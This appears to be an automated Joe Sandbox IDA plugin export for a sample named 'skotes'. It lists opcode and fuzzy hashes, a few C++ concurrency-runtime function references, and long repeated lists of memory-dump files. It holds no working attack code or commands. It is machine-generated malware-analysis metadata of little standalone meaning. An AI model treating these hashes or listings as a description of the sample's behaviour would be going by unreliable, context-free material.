                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: EqualOffsetTypeids
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1707706676-0
                                                                                                                                                                                            • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                            • Instruction ID: 7eaff4e634fd5a8d80103308395a3c3dfca309353aa4c2f4300385deca6ff49c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                                                                                            • Instruction Fuzzy Hash: A3517A35A042099FDF11CF68C8816EEFBF6EF15354F14449AE851A7361DB32BA45CB90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Mtx_unlock$Cnd_broadcastCurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3264154886-0
                                                                                                                                                                                            • Opcode ID: d97fd5680e3908eac553b89cab6ca6d1dce7d358a736d914a25098b15dc770d0
                                                                                                                                                                                            • Instruction ID: 5aea4c511a3f8615d9a9e578788468952972584f6770e0854460630974282667
                                                                                                                                                                                            • Opcode Fuzzy Hash: d97fd5680e3908eac553b89cab6ca6d1dce7d358a736d914a25098b15dc770d0
                                                                                                                                                                                            • Instruction Fuzzy Hash: 7441F0B0A816129FDB24DF65C944B9BB7E9FF14360F04452DE816D7380EB31EA00CB81
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0062DB64
                                                                                                                                                                                              • Part of subcall function 00628F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00628F50
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 0062DBC3
                                                                                                                                                                                            • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 0062DBE9
                                                                                                                                                                                            • Concurrency::location::_Assign.LIBCMT ref: 0062DC56
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Context$Base::Concurrency::details::$EventInternal$AssignBlockingConcurrency::location::_FindNestingPrepareThrowTraceWork
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1091748018-0
                                                                                                                                                                                            • Opcode ID: 99563566eda5fffc6a852305dbcaeee9d7d35e2832c2cca0e6dea8e4739dcccc
                                                                                                                                                                                            • Instruction ID: 6abd81088cf157fb99e6f25c1c2a4f32e9cee7e1de6ae40c102d5f37e1f76523
                                                                                                                                                                                            • Opcode Fuzzy Hash: 99563566eda5fffc6a852305dbcaeee9d7d35e2832c2cca0e6dea8e4739dcccc
                                                                                                                                                                                            • Instruction Fuzzy Hash: DF41F370704620ABDF199B24D896BFDBB7AAF45310F0440ADE4065B382CB70AD45CBD5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 006256F2
                                                                                                                                                                                            • _InternalDeleteHelper.LIBCONCRT ref: 00625726
                                                                                                                                                                                            • Concurrency::details::SchedulerBase::TraceSchedulerEvent.LIBCMT ref: 0062578B
                                                                                                                                                                                            • SafeRWList.LIBCONCRT ref: 0062579A
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678533782.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678653730.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678752348.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678839640.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678990990.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679034371.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679094724.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679166742.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679263797.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679345356.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679828183.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2679928203.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680057540.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680203916.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680271854.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680313290.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680356713.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680404069.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680445817.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680490283.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680528882.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680571195.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680612980.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680650433.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680692413.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680732706.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680778706.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680817127.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680857371.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680899220.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680941093.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2680989813.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681033622.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681081271.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681181345.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681221438.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681260533.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681299754.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681343723.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2681414452.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: DeleteHelperInternalScheduler$Base::Concurrency::details::EventListSafeTrace
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 893951542-0
                                                                                                                                                                                            • Opcode ID: 4321f418ef67425f27aae69250d6cc2aa84b9227ec1a30da19b3ac9ae522944a
                                                                                                                                                                                            • Instruction ID: 1dc1ff439f4b7342624cff054341eb1bd06ec970337ef2501d660b53ac239c49
                                                                                                                                                                                            • Opcode Fuzzy Hash: 4321f418ef67425f27aae69250d6cc2aa84b9227ec1a30da19b3ac9ae522944a
                                                                                                                                                                                            • Instruction Fuzzy Hash: B6310336B41A249FCB15DF20D885AAD77A7AF88710F184179E90A9B395DF30AD058B90
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00622D0F
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000006.00000002.2669413037.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000006.00000002.2669287233.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2669413037.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670210745.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2670311548.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671122576.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671260603.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2671422678.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2673832126.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675069382.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2675756112.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676033552.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676193839.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2676452741.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678076594.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678300580.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000006.00000002.2678423948.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
